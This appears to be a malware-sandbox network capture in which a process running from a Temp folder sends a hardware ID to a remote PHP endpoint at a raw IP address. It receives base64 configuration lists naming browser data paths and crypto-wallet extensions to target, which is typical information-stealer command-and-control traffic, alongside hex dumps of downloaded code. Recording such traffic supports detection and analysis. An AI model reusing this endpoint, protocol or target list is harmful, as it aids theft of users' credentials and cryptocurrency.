Feb 21, 2024 00:22:50.695715904 CET	1286	IN	Data Raw: ff 3b fb 0f 84 6c 01 00 00 6a 03 e8 53 38 00 00 59 83 f8 01 0f 84 07 01 00 00 6a 03 e8 42 38 00 00 59 85 c0 75 0d 83 3d 00 a0 42 00 01 0f 84 ee 00 00 00 81 fe fc 00 00 00 0f 84 36 01 00 00 68 d4 7c 42 00 68 14 03 00 00 bf 90 c3 42 00 57 e8 ac 37 Data Ascii: ;ljS8YjB8Yu=B6h\|BhBW7hBVSfBpBuh\|BSVt7t3PPPPPlV@7@Y<v*V37ELB+jh\|B+SPI6uh\|BVW5u
Feb 21, 2024 00:22:50.695790052 CET	1286	IN	Data Raw: 27 39 05 c4 c9 42 00 76 1f 56 ff 15 e8 70 42 00 8d 86 e8 03 00 00 3b 05 c4 c9 42 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 ca 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 6a 00 ff 75 0c ff 75 08 e8 f8 f6 ff ff 8b f8 83 c4 0c 85 ff 75 27 39 05 c4 c9 42 Data Ascii: '9BvVpB;Bvu_^]UVW3juuu'9BvVpB;Bvu_^]UVW3uu>YYu,9Et'9BvVpB;Bvu_^]U}ut]uj5B
Feb 21, 2024 00:22:50.695831060 CET	1286	IN	Data Raw: 53 e8 dd fa ff ff 59 89 07 85 c0 75 13 8d 46 14 6a 02 89 46 08 89 06 58 89 46 18 89 46 04 eb 0d 8b 3f 89 7e 08 89 3e 89 5e 18 89 5e 04 81 4e 0c 02 11 00 00 33 c0 5f 40 5b eb 02 33 c0 5e 5d c3 8b ff 55 8b ec 83 7d 08 00 74 27 56 8b 75 0c f7 46 0c Data Ascii: SYuFjFXFF?~>^^N3_@[3^]U}t'VuFtV<ff&fY^]A@tyt$IxQP>YYuUQSV5G@EtuJ (EKE>u8
Feb 21, 2024 00:22:50.695939064 CET	1286	IN	Data Raw: 00 00 0f 84 80 00 00 00 83 e8 41 74 10 48 48 74 58 48 48 74 08 48 48 0f 85 8c 05 00 00 80 c2 20 c7 85 94 fd ff ff 01 00 00 00 88 95 ef fd ff ff 83 8d f0 fd ff ff 40 8d bd f4 fd ff ff b8 00 02 00 00 89 bd e4 fd ff ff 89 85 9c fd ff ff 39 b5 e8 fd Data Ascii: AtHHtXHHtHH @9H00uu[;uBy
Feb 21, 2024 00:22:50.695979118 CET	1286	IN	Data Raw: 57 e8 9e 2f 00 00 83 c1 30 89 9d 9c fd ff ff 8b f8 8b da 83 f9 39 7e 06 03 8d b8 fd ff ff 88 0e 4e eb bd 8d 45 f3 2b c6 46 f7 85 f0 fd ff ff 00 02 00 00 89 85 e0 fd ff ff 89 b5 e4 fd ff ff 74 62 85 c0 74 07 8b ce 80 39 30 74 57 ff 8d e4 fd ff ff Data Ascii: W/09~NE+Ftbt90tW0@?If90t;u+(;uBI8t@;u+}@t2t-t+t +
Feb 21, 2024 00:22:50.696083069 CET	1286	IN	Data Raw: 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00 7c ed 8b 00 8b 7e 64 3d 8e 00 00 c0 75 09 c7 46 64 83 00 00 00 eb 7e 3d 90 00 00 c0 75 09 Data Ascii: MS^`N`Hj$Y~\d9\|~d=uFd~=uFdn=uFd^=uFdN=uFd>=uFd.=uFd=uFd=uFdvdjY~d`QY^`[_^]$3u
Feb 21, 2024 00:22:50.866838932 CET	1286	IN	Data Raw: 89 45 f8 3b de 7c 02 8b de 39 1d c4 dd 81 00 7d 6b bf e4 dd 81 00 6a 40 6a 20 e8 f1 e6 ff ff 59 59 85 c0 74 51 83 05 c4 dd 81 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 Data Ascii: E;\|9}kj@j YYtQ ;s1H```3f@f@ @/@P;r9\|3~rEt\tWMtMuPqBt=4EEFhFPqBFEGE;\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49732	185.172.128.145	80	3780	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:22:53.345349073 CET	417	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHC Host: 185.172.128.145 Content-Length: 215 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 35 44 44 43 44 38 38 46 46 37 33 38 39 37 32 35 30 38 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 2d 2d 0d 0a Data Ascii: ------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="hwid"145DDCD88FF73897250831------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="build"default2------FIIIIJKFCAAECAKFIEHC--
Feb 21, 2024 00:22:54.308253050 CET	351	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:22:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 156 Connection: keep-alive Vary: Accept-Encoding Data Raw: 5a 44 63 33 5a 54 49 30 59 6a 55 35 59 57 51 32 4e 57 51 32 4f 57 45 77 4d 6a 49 33 59 6d 4d 32 4f 44 63 35 4d 6a 56 6c 5a 6a 4e 6c 4f 57 51 7a 4d 44 6b 33 59 7a 4a 6b 4e 6d 55 79 4e 7a 45 34 4f 54 6c 6d 4f 44 6b 77 59 57 49 78 4e 6a 68 6c 5a 54 55 35 4e 54 6c 69 59 7a 49 30 5a 57 45 79 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: ZDc3ZTI0YjU5YWQ2NWQ2OWEwMjI3YmM2ODc5MjVlZjNlOWQzMDk3YzJkNmUyNzE4OTlmODkwYWIxNjhlZTU5NTliYzI0ZWEyfGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Feb 21, 2024 00:22:54.358933926 CET	470	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHI Host: 185.172.128.145 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 2d 2d 0d 0a Data Ascii: ------DGDHJEGIEBFHDGDGHDHIContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------DGDHJEGIEBFHDGDGHDHIContent-Disposition: form-data; name="message"browsers------DGDHJEGIEBFHDGDGHDHI--
Feb 21, 2024 00:22:54.648624897 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:22:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2
Feb 21, 2024 00:22:54.648699045 CET	430	IN	Data Raw: 68 79 62 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c Data Ascii: hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZ
Feb 21, 2024 00:22:54.704566956 CET	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEB Host: 185.172.128.145 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 2d 2d 0d 0a Data Ascii: ------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="message"plugins------AAEHIDAKECFIEBGDHJEB--
Feb 21, 2024 00:22:54.996895075 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:22:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIF
Feb 21, 2024 00:22:54.996959925 CET	1286	IN	Data Raw: 64 68 62 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e Data Ascii: dhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZ
Feb 21, 2024 00:22:54.997081041 CET	1286	IN	Data Raw: 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 Data Ascii: cmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramV
Feb 21, 2024 00:22:54.997133970 CET	1286	IN	Data Raw: 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 Data Ascii: xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ
